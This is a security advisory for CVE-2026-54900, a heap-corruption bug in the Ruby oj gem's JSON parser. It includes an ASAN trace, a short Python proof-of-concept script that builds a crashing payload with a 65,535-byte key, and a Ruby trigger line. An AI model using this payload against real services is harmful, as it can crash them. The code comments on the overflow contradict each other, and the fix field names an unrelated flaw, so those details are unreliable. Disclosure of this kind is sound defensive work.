PT-2026-51086 · Rubygems · Oj
Publicado
2026-06-19
·
Atualizado
2026-06-19
·
CVE-2026-54900
CVSS v4.0
8.7
Alta
| Vetor | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
Summary
Oj::Parser#parse in usual mode with create id enabled is vulnerable to heap corruption via a negative-size memcpy. When a JSON object key is exactly 65,535 bytes long, an integer truncation in form attr (usual.c:63) converts the length to -1 before passing it to memcpy. This causes memcpy to copy SIZE MAX bytes (interpreted as a huge size t), corrupting heap memory and crashing the process.Version
- Software: oj gem
- Affected: all versions with
ext/oj/usual.c - Latest tested: 3.17.1 (confirmed present)
Details
ext/oj/usual.c, form attr:c
// usual.c:55–64
static ID form attr(const char *str, size t slen) {
char buf[4096];
// ...
int blen = (int)slen + 1; // ← truncates: 65535 + 1 = 65536 → wraps to 0
// or: 65535 cast to int = 65535 (fits),
// but blen = 65536 → INT overflow on +1 if slen=INT MAX
// ...
memcpy(buf, "@", 1);
memcpy(buf + 1, str, (size t)blen); // ← size t(-1) = SIZE MAX
}The cache (
cache intern) uses a fixed 65,536-byte slab. When slen = 65535, the arithmetic wraps and memcpy is called with (size t)-1.ASAN report:
==80452==ERROR: AddressSanitizer: negative-size-param: (size=-1)
#0 memcpy
#1 form attr /ext/oj/usual.c:63
#2 cache intern /ext/oj/cache.c:326
#3 get attr id /ext/oj/usual.c:186
#4 close object create /ext/oj/usual.c:374
#5 parse /ext/oj/parser.c:693
#6 parser parse /ext/oj/parser.c:1408
0x531000528800 is located 0 bytes inside of 65536-byte region [0x531000528800, 0x531000538800)Reproduce
Generate the payload:
python
key = 'A' * 65535
with open('poc.json', 'w') as f:
f.write('{"json class":"Oj::Bag","' + key + '":1}')Trigger:
ruby
require 'oj'
Oj::Parser.new(:usual, create id: 'json class').parse(STDIN.read)Correção
Use After Free
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Oj